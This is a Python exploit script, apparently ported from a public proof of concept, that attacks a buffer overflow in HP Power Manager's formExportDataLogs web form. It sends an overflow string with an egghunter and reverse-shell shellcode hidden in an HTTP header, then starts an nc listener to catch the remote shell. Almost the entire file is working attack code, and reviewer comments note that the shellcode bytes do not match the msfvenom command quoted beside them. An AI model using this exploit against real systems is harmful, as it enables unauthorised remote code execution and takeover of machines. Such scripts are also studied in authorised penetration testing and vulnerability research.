#!/usr/bin/python3
# This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
# For the original script visit: https://github.com/Muhammd/HP-Power-Manager
#
# Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
# <Remote IP Address>: ip address the HP Power Manager is running on
# <Remote Port>: port the application is running on
# <Local Listener Port>: local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
#
# Swap out the shellcode in `buf` for one generated with your own LHOST/LPORT (see the msfvenom
# command directly above `buf`); the LPORT baked into it must match <Local Listener Port>.
# Use only against systems you are explicitly authorized to test.
# Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
# Author: CountablyInfinite
import subprocess
from os import system
from socket import AF_INET, SOCK_STREAM, socket
from sys import argv, exit
from urllib import parse
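# Command line: <Remote IP Address> <Remote Port> <Local Listener Port>.
# Exactly three arguments are accepted; anything else (missing, surplus,
# non-numeric or out-of-range port) prints the usage text and exits.
try:
    HOST: str = argv[1]  # host running the HP Power Manager web interface
    PORT: int = int(argv[2])  # TCP port of that web interface
    # Port the reverse shell connects back to; the nc listener is bound here.
    # It has to match the LPORT compiled into the shellcode in `buf`, which
    # this script cannot verify for you.
    LPORT: int = int(argv[3])
    if len(argv) > 4:
        raise IndexError  # surplus arguments are a usage error too
    if not all(0 < p < 65536 for p in (PORT, LPORT)):
        raise ValueError  # int() happily accepts e.g. 70000; reject it up front
except (IndexError, ValueError):
    # ValueError covers a non-numeric or out-of-range port, which would
    # otherwise surface as a traceback instead of the usage text.
    print(
        "Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>"
        % argv[0]
    )
    print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
    exit()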
# msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c
# add reverse shell after 'b33fb33f'
#
# Stage-2 payload: the egg 'b33fb33f' followed by the reverse shell. It is
# carried in the Accept: header of the request built further down and is
# located in memory at runtime by the egghunter in `hunter`, so none of these
# bytes go through the overflowed fileName= field. The egg has to stay
# 'b33fb33f' (it matches the '-e b33f' option the egghunter was built with).
# Kept as a str rather than bytes because it is concatenated into the text
# request and the whole request is encoded as latin1 in one go, which maps
# every \x00-\xff character to the identical byte value.
# NOTE(review): the LHOST/LPORT in this blob are whatever msfvenom was given
# when it was generated; regenerate it for your own listener, keep the same
# bad-character list, and make sure its LPORT matches <Local Listener Port>.
# NOTE(review): the bytes below are not printable/alphanumeric, so they do not
# look like the output of the x86/alpha_mixed command quoted above — treat the
# command as a template and regenerate rather than reuse this blob.
buf: str = (
    "b33fb33f"
    "\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
    "\x0e\x94\xbe\x85\xe6\x83\xee\xfc\xe2\xf4\x68\x56\x07\xe6"
    "\x94\xbe\xe5\x6f\x71\x8f\x45\x82\x1f\xee\xb5\x6d\xc6\xb2"
    "\x0e\xb4\x80\x35\xf7\xce\x9b\x09\xcf\xc0\xa5\x41\x29\xda"
    "\xf5\xc2\x87\xca\xb4\x7f\x4a\xeb\x95\x79\x67\x14\xc6\xe9"
    "\x0e\xb4\x84\x35\xcf\xda\x1f\xf2\x94\x9e\x77\xf6\x84\x37"
    "\xc5\x35\xdc\xc6\x95\x6d\x0e\xaf\x8c\x5d\xbf\xaf\x1f\x8a"
    "\x0e\xe7\x42\x8f\x7a\x4a\x55\x71\x88\xe7\x53\x86\x65\x93"
    "\x62\xbd\xf8\x1e\xaf\xc3\xa1\x93\x70\xe6\x0e\xbe\xb0\xbf"
    "\x56\x80\x1f\xb2\xce\x6d\xcc\xa2\x84\x35\x1f\xba\x0e\xe7"
    "\x44\x37\xc1\xc2\xb0\xe5\xde\x87\xcd\xe4\xd4\x19\x74\xe1"
    "\xda\xbc\x1f\xac\x6e\x6b\xc9\xd6\xb6\xd4\x94\xbe\xed\x91"
    "\xe7\x8c\xda\xb2\xfc\xf2\xf2\xc0\x93\x41\x50\x5e\x04\xbf"
    "\x85\xe6\xbd\x7a\xd1\xb6\xfc\x97\x05\x8d\x94\x41\x50\xb6"
    "\xc4\xee\xd5\xa6\xc4\xfe\xd5\x8e\x7e\xb1\x5a\x06\x6b\x6b"
    "\x12\x8c\x91\xd6\x45\x4e\xb9\x10\xed\xe4\x94\xaf\xbe\x6f"
    "\x72\xd4\x95\xb0\xc3\xd6\x1c\x43\xe0\xdf\x7a\x33\x11\x7e"
    "\xf1\xea\x6b\xf0\x8d\x93\x78\xd6\x75\x53\x36\xe8\x7a\x33"
    "\xfc\xdd\xe8\x82\x94\x37\x66\xb1\xc3\xe9\xb4\x10\xfe\xac"
    "\xdc\xb0\x76\x43\xe3\x21\xd0\x9a\xb9\xe7\x95\x33\xc1\xc2"
    "\x84\x78\x85\xa2\xc0\xee\xd3\xb0\xc2\xf8\xd3\xa8\xc2\xe8"
    "\xd6\xb0\xfc\xc7\x49\xd9\x12\x41\x50\x6f\x74\xf0\xd3\xa0"
    "\x6b\x8e\xed\xee\x13\xa3\xe5\x19\x41\x05\x65\xfb\xbe\xb4"
    "\xed\x40\x01\x03\x18\x19\x41\x82\x83\x9a\x9e\x3e\x7e\x06"
    "\xe1\xbb\x3e\xa1\x87\xcc\xea\x8c\x94\xed\x7a\x33"
)
# egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
#
# 32-byte egghunter: scans memory for the tag 'b33f' (the "\x62\x33\x33\x66"
# in the middle is that tag) and jumps to the bytes following its doubled
# occurrence, i.e. to the reverse shell in `buf`.
hunter: bytes = b"".join(
    (
        b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e",
        b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7",
        b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7",
    )
)

# Stage-1 overflow string for the fileName= field, laid out as:
#   [ "A" * (721 - 32) ][ 30 x NOP ][ hunter ][ jmp short ][ 3-byte gadget addr ]
# i.e. the hunter ends at offset 751; "\xeb\xc2" (JMP SHORT -0x3e) then lands
# at offset 691, inside the NOP sled, which slides into the hunter.
# The gadget address is only three bytes: the missing high byte is presumably
# supplied by the string terminator (making it 0x004174d5 in DevManBE.exe),
# which is also why nothing useful can follow it and the shellcode has to be
# fetched via the egghunter instead — confirm against the original write-up.
# The pop/pop/ret gadget is the classic SEH-overwrite shape, so the jmp would
# be sitting in nSEH — again an inference, not something this file proves.
_sled = b"\x90" * 30
_pad = b"A" * (721 - len(hunter))  # "A" == "\x41"
buffer = b"".join(
    (
        _pad,
        _sled,
        hunter,
        b"\xeb\xc2\x90\x90",  # JMP SHORT 0xC2 (back into the NOP sled)
        b"\xd5\x74\x41",  # pop esi # pop ebx # ret 10 (DevManBE.exe)
    )
)
# Form fields of the export request, joined with '&' below. The overflow rides
# in fileName=: quote_plus() percent-encodes every non-URL-safe byte of
# `buffer` so the raw bytes survive form decoding on the target. The remaining
# fields are ordinary export-form values; "1%253B" is a doubly-encoded "1;"
# and is sent exactly as the original request does.
_form_fields = [
    "dataFormat=comma",
    "exportto=file",
    "fileName=%s" % parse.quote_plus(buffer),
    "bMonth=03",
    "bDay=12",
    "bYear=2017",
    "eMonth=03",
    "eDay=12",
    "eYear=2017",
    "LogType=Application",
    "actionType=1%253B",
]
content = "&".join(_form_fields)

# The request is assembled by hand (no http.client) so that the Accept: header
# can carry the raw egg + shellcode in `buf`. Content-Length counts characters,
# which equals the byte count because `content` is pure ASCII (quote_plus
# output plus literal ASCII fields).
_headers = [
    ("Host", HOST),
    ("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("Accept", buf),
    ("Referer", "http://%s/Contents/exportLogs.asp?logType=Application" % HOST),
    ("Content-Type", "application/x-www-form-urlencoded"),
    ("Content-Length", str(len(content))),
]
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "".join("%s: %s\r\n" % (name, value) for name, value in _headers)
payload += "\r\n" + content
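print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
print(
    "[+] Sending exploit to Ip "
    + str(HOST)
    + " on port "
    + str(PORT)
    + ". Starting local listener on port "
    + str(LPORT)
)
# Start the catcher BEFORE the request goes out: the shellcode calls back as
# soon as the egghunter finds it, and a callback to a port nobody is bound to
# is simply refused. Argument list with shell=False: LPORT is an int so there
# was no injection risk, but this also drops the shell round-trip and fails
# fast (FileNotFoundError) if nc is not on PATH, before anything is sent.
# There is still no explicit wait for nc to bind; in practice the target's
# parse + overflow + egghunt takes far longer than that.
listener = subprocess.Popen(["nc", "-nlvp", str(LPORT)])
try:
    # latin1 maps each \x00-\xff code point to the identical byte, so the
    # shellcode in `buf` goes out unmodified. sendall() loops until the whole
    # request is on the wire, whereas send() may return after a partial write.
    # The context manager closes the socket even if connect()/sendall() raise.
    with socket(AF_INET, SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        s.sendall(payload.encode("latin1"))
except OSError:
    # Nothing was delivered, so there is no shell to wait for.
    listener.terminate()
    raise
# Hand the terminal to nc until the session (or the operator) ends it.
listener.wait()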